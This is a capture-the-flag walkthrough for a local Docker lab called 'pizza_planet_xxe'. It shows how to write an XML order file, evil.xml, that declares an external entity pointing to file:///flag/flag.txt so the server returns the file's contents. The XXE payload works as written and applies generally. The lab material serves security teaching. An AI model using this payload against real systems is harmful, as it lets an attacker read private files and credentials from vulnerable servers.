Want to run this Docker container locally?

docker run -d -p 9045:80 --name pizza_planet_xxe --restart always joshbeck2024/ctf_local-xxe

For this challenge, we need to craft an XML file that will read /flag/flag.txt

We are given a template to download, which can be re-uploaded. We just need to modify it to take advantage of external references.

We can test for LFI by modifying MY_ENTITY to include an external reference.

<!DOCTYPE THIS_CAN_BE_ANYTHING [
  <!ENTITY MY_ENTITY SYSTEM "file:///flag/flag.txt">
]>

• In the context of a <!ENTITY> declaration in an XML document, the keyword SYSTEM is used to define an external entity. External entities are resources or data that are located outside the XML document and can then be referenced within the document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test123 [
<!ENTITY myentity SYSTEM "file:///flag/flag.txt">
]>
<order>
    <item>
        <name>&myentity;</name>
        <food_item>Pepperoni with Extra Cheese</food_item>
    </item>
    <item>
        <name>Woody</name>
        <food_item>BBQ Chicken</food_item>
    </item>
</order>

Name this file evil.xml and upload to get the flag.